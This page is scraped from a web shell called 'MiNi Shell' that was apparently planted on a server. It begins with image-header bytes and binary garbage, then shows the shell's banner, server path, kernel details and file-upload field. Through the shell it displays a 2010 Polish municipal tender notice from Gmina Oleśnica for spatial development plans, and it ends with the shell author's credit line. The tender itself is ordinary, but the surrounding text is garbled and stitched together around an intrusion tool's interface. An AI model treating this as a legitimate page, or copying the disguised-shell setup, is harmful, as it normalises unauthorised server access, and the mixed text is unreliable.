JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100630/190100-N-2010.html

<p class="kh_header"><b>Oleśnica: Opracowanie projektów miejscowych planów zagospodarowania przestrzennego w miejscowościach : Ostrowina, Bystre, Krzeczyn, Ligota Mała, Nieciszów, Piszkawa gm. Oleśnica</b><br>
<b>Numer ogłoszenia: 190100 - 2010; data zamieszczenia: 30.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Oleśnica , ul. 11- go Listopada 24, 56-400 Oleśnica, woj. dolnośląskie, tel. 071 3140215, faks 071 3140204.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.olesnica.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektów miejscowych planów zagospodarowania przestrzennego w miejscowościach : Ostrowina, Bystre, Krzeczyn, Ligota Mała, Nieciszów, Piszkawa gm. Oleśnica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie projektów miejscowych planów zagospodarowania przestrzennego w miejscowościach : Ostrowina, Bystre, Krzeczyn, Ligota Mała, Nieciszów, Piszkawa gm. Oleśnica. zgodnie z obowiązującymi przepisami w tym zakresie. 
1/1Obszar do opracowania projektów planu jest opisany w uchwałach  Rady Gminy Oleśnica:
1) Ostrowina - Uchwała Rady Gminy  z dnia 29 czerwca 2007 r. Nr VIII/33/07- 0,3834 ha.
2) Bystre - Uchwała Rady Gminy z dnia 30 marca  2010 r. Nr  XLVII/222/10- 945,6101 ha.
3) Krzeczyn - Uchwała Rady Gminy z dnia 30 marca  2010 r. Nr  XLVII/223/10 - 1085,5984 ha.
4) Ligota Mała - Uchwała Rady Gminy z dnia 30 marca  2010 r. Nr  XLVII/224/10 - 1699,4909 ha.
5) Nieciszów - Uchwała Rady Gminy z dnia 30 marca  2010 r. Nr  XLVII/225/10 - 798,3485 ha.
6) Piszkawa - Uchwała Rady Gminy z dnia 30 marca  2010 r. Nr  XLVII/226/10- 238,7375 ha.   

1/2. Zakres przedmiotu zamówienia obejmuje:
1) analizę wniosków do planu i opracowanie propozycji ich rozpatrzenia,
2) przygotowanie wzorów pism oraz ogłoszeń dla potrzeb sporządzenia planu, 
3) uzyskanie niezbędnych podkładów geodezyjnych,
4) opracowanie koncepcji planu,
5) prezentację koncepcji planu na mapie w skali 1:1000,
6) opracowanie projektu planu do zaopiniowania oraz prezentacja planu na posiedzeniu Gminnej Komisji Urbanistyczno - Architektonicznej,
7) opracowanie projektu planu z uwzględnieniem uwag ;                                                                                             8) sporządzenie prognozy oddziaływania na środowisko z uwzględnieniem postępowania w sprawie strategicznej oceny oddziaływania na środowisko,
9) sporządzenie opracowania ekofizjograficznego,
10) przygotowanie pisemnego uzasadnienia i podsumowania do przyjętego dokumentu zgodnie z art. 42 i 55 pkt 3 ustawy z dnia 3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227),
11) sporządzenie prognozy skutków finansowych uchwalenia planu,
12) sporządzenie wniosków o zgodę na przeznaczenie gruntów rolnych na cele nierolnicze i nieleśne oraz gruntów leśnych na cele nieleśne i nierolnicze,
13) opiniowanie i uzgodnienie projektu planu, w tym prezentacja projektu planu na posiedzeniu Gminnej Komisji Urbanistyczno - Architektonicznej,
14) wprowadzenie zmian do projektu planu wynikających z uzyskanych opinii i dokonanych uzgodnień,
15) udział w dyskusji publicznej nad przyjętymi w projekcie planu rozwiązaniami i wprowadzanie ewentualnych zmian z tym związanymi,
16) analiza i opracowanie propozycji rozpatrzenia uwag wniesionych w związku z wyłożeniem projektu planu i prognozy oddziaływania na środowisko do publicznego wglądu oraz udzielanie informacji i odpowiedzi na pytania zainteresowanych,
17) wprowadzenie zmian do projektu planu z rozpatrzeniem uwag, o których mowa w poz. 16,
18) prezentacja projektu planu Radzie Gminy  Oleśnica  oraz  Wójtowi Gminy  wraz z listą nieuwzględnionych uwag, 
19) ponowne uzgadnianie projektu planu,
20) wprowadzenie zmian do projektu planu wynikających z ponowionych uzgodnień,
21) przygotowanie projektu planu do uchwalenia,
22) przygotowanie i skompletowanie dla Wojewody Dolnośląskiego dokumentacji formalno - prawnej oraz planistycznej wraz z projektem uchwał Rady Gminy Oleśnica w celu sprawdzenia zgodności z prawem i publikacji w Dzienniku Urzędowym Województwa Dolnośląskiego.

1/3. Wykonawca sporządzi kopie planu w wersji elektronicznej płyta CD w formacie Portale Dokument Format (PDF) - 1 egzemplarz, DGN - 1 egzlemplarz Photographic Experts Group (JPG) - 1 egzemplarz,  oraz w postaci drukowanej w wymaganej - niezbędnej  ilości :
1) Projekt planu do wewnętrznego opiniowania ,
2) Prognoza oddziaływania na środowisko ,
3) Projekt planu do opiniowania i uzgodnienia .
4) Projekt planu z prognozą oddziaływania na środowisko do wyłożenia,
5) Projekt planu do uchwalenia ,
6) Prognoza skutków finansowych i uchwalenia planu,
7) Pomniejszenie projektu planu do publikacji ,
8) Dokumentacja formalno - prawna  (oprawiona w sposób uniemożliwiający dekompletację),

1/4. W ww planie powinny znajdować się zapisy dotyczące przestrzeni publicznej w centrum wsi tj. obszaru przestrzeni publicznej, o którym mowa w art. 2 pkt 6 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr. 80 poz. 717 z późn. zm.). Ustawa definiuje obszar przestrzeni publicznej jako obszar o szczególnym znaczeniu dla zaspokojenia potrzeb mieszkańców, poprawy jakości ich życia i sprzyjający nawiązywaniu kontaktów społecznych ze względu na jego położenie oraz cechy funkcjonalno-przestrzenne.

1/5. Zapis planu należy wykonać w takiej formie, ażeby dla każdej jednostki elementarnej (najmniejszego obszaru wydzielonego przestrzennie) zawarte były wszystkie ustalenia pozwalające na bezpośredni wydruk jako wypis i wyrys z miejscowego planu zagospodarowania przestrzennego (do dalszych prac projektowych). Ustalenia dla jednostki nie mogą być zawarte w kilku miejscach tego planu. W tekście planu należy używać określeń i terminów stosowanych w istniejącym ustawodawstwie. W każdej sytuacji należy wprowadzić definicję terminu. Używając określonych, stosownych terminów należy przywołać w rozumieniu jakiej podstawy prawnej jest on użyty. Część szczegółowa odnosząca się do jednostki elementarnej musi co najmniej zawierać elementy zawarte w art. 15 ust.2, ewentualnie ust. 3 ustawy oraz wszelkie inne istotne ustalenia. Cała dokumentacja planistyczna powinna być wykonana w technice cyfrowej(szczegóły techniczne i programowanie ustalone zostaną na etapie roboczym) umożliwiającej na bieżące korzystanie z opracowania. Tekst planu i rysunek planu należy tak wykonywać, ażeby można było wykonać wydruk dla danej jednostki elementarnej jako wypis i wyrys z planu.

1/6. Wszystkie mapy i rysunki planu należy wykonać w technice kolorowej z oraz w 1( jednym) egzemplarzu czarno-białym do publikacji w Dzienniku Urzędowym. Tekst planu powinien być nie w formie opisu, lecz w formie dokumentu prawnego, zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 20 czerwca 2002 roku w sprawie zasad techniki prawodawczej (Dz. U. nr 100, poz. 908). Wykonawca zobowiązany jest do przygotowania projektu wszystkich dokumentów formalnoprawnych i na każdym etapie zobowiązany jest do sprawdzenia poprawności przebiegu toku formalno-prawnego, a w przypadku wystąpienia nieprawidłowości zobowiązany jest pisemnie poinformować o tym prowadzącego opracowanie ze strony urzędu.

1/7. Opracowania planów powinny zawierać:
a) tekst uchwały,
b) rysunki planu zagospodarowania przestrzennego oraz zmian miejscowego planu zagospodarowania w skali 1:1000 w technice czarno-białej oraz w technice barwnej w formie papierowej i w formie zapisu elektronicznego na płycie CD,
c) zestawienie działek, których przeznaczenie zostało zmienione w opracowywanym planie,
d) prognozę skutków finansowych uchwalenia planu (analizę ekonomiczną skutków uchwalenia planu),
e) prognozę skutków wpływu ustaleń planu na środowisko przyrodnicze,
f) ustalenia i rysunek planu (w pomniejszeniu) w formie elektronicznej na płycie CD,
przygotowane do druku w Dzienniku Urzędowym Województwa Dolnośląskiego,
g) opracowanie ekofizjograficzne,
h) dokumenty formalno-prawne.

1/8. Opracowanie planu dla każdej miejscowości  należy wykonać w 5 egzemplarzach, w teczkach formatu A-4, przy czym materiały części tekstowej projektu należy przekazać Zmawiającemu zapisane także na dwóch płytach CD Word for Windows.  Wymaganą ilość egzemplarzy poszczególnych opracowań podano szczegółowo w umowie. W ramach prac nad stanem istniejącym należy wykonać jako minimum inwentaryzacje terenowe tekstowe i graficzne takie jak: zainwestowania i użytkowania terenów, stan własności jako minimum w grupach własności, infrastrukturę techniczną w zakresie koniecznym do ustaleń projektowych na podstawie dostępnych dokumentacji z naniesieniem instalacji projektowych, niezbędne mapy związane z opracowaniem ekofizjograficznym, w tym występowanie gruntów pochodzenia organicznego, klas gleb, waloryzację kulturową i przyrodniczą. Opracowania studialne itp. należy przekazać Zamawiającemu w 2 egzemplarzach.

1/9. Wykonawca sporządzi przedmiot zamówienia oraz zapewni we własnym zakresie:
a) mapy do celów planowania przestrzennego zgodne z warunkami rozporządzenia Ministra Infrastruktury w sprawie wykonywania planów zagospodarowania przestrzennego (na dzień zatwierdzenia),
b) inne mapy topograficzne niezbędne do opracowania ekofizjografii i prognozy skutków wpływu ustaleń planu na środowisko przyrodnicze,
c) inne niezbędne materiały do przygotowania projektu miejscowego planu zagospodarowania przestrzennego i zmiany studium uwarunkowań i kierunków zagospodarowania,
d) procedurę uzgadniania miejscowego planu zagospodarowania przestrzennego i studiów uwarunkowań we właściwych organach,
e) uczestnictwo projektantów w procedurze konsultacji społecznych, wyłożenia miejscowego planu zagospodarowania przestrzennego i studiów uwarunkowań oraz procedurze uchwalenia ich przez Radę Gminy Oleśnica.

1/10. Zamawiający przekaże Wykonawcy zamówienia następujące materiały wyjściowe:
a) kopie map zasadniaczych o których mowa w art. 16 ust. 1 ustawy w formacie DGN,
b) kopie wniosków do planu miejscowego,
c) do wglądu wydane decyzje o warunkach zabudowy i zagospodarowania terenu, decyzje o ustaleniu lokalizacji inwestycji celu publicznego oraz o warunkach zabudowy,
d) do wglądu Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Olesnica .

1/11. Koszty związane z  czynnościami  wynikającymi z art. 17 pkt 1,10,ustawy z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym  poniesie Zamawiający.
1/12. Harmonogram realizacji przedmiotu zamówienia określi Wykonawca wg wzoru stanowiącego załącznik Nr 5 do SIWZ.
1/13. W opracowaniu miejscowego planu zagospodarowania przestrzennego należy stosować wymagania określone Rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1587).
/14. Zamawiający będzie uczestniczył w postępowaniu w trakcie opracowywania miejscowego planu zagospodarowania przestrzennego w przesłaniu materiałów opracowanych przez Wykonawcę. Za treść merytoryczną i przestrzeganie wymagań formalnych odpowiada Wykonawca. Koszt druku i powielania materiałów ponosi Wykonawca..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) wykażą, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonalni( zakończyli)  w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia  - co najmniej 1 usługę  polegającą na opracowaniu planu zagospodarowania przestrzennego, którego zakres opracowania obejmował obszar o powierzchni co najmniej 30% przedmiotu zamówienia , z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączą dokument potwierdzający, że usługi zostały wykonane  lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykażą, że dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia,  które pełnić będą funkcję głównych projektantów planu zagospodarowania przestrzennego będącą/cych członkiem Izby Urbanistów i posiadająca doświadczenie w samodzielnym projektowaniu przestrzeni oraz kierowania co najmniej opracowaniem jednego planu zagospodarowania przestrzennego, który wszedł w życie, należący do właściwej  Izby Inżynierów Budownictwa wraz z informacją o podstawie dysponowania tymi osobami.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji  cześć zamówienia , przedkłada pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana terminu obowiązywania umowy  i  zmiany wynagrodzenia może nastąpić  w przypadku:

1)konieczności wykonywania  prac dodatkowych których nie można było przewidzieć  na dzień podpisania umowy;
2)zmiany przepisów dla opracowywania mpzp;
     
10. Wprowadzenie zmian może nastąpić na pisemny wniosek Zamawiającego lub Wykonawcy z określeniem   
      warunków dokonania zmiany z uwzględnieniem:  opisu  i uzasadnieniem zmiany,  kosztów zmiany i   
      sposób jej obliczenia  oraz wpływ zmiany na wysokość wynagrodzenia , a także czas  wykonywania     
      zmiany  i jej wpływ zmiany na termin zakończenia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.olesnica.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy 56-400 Olesnica ul. 11 Listopada 24 pok. nr 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2010 godzina 09:00, miejsce: Urząd Gminy 56-400 Olesnica ul. 11 Listopada 24 pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com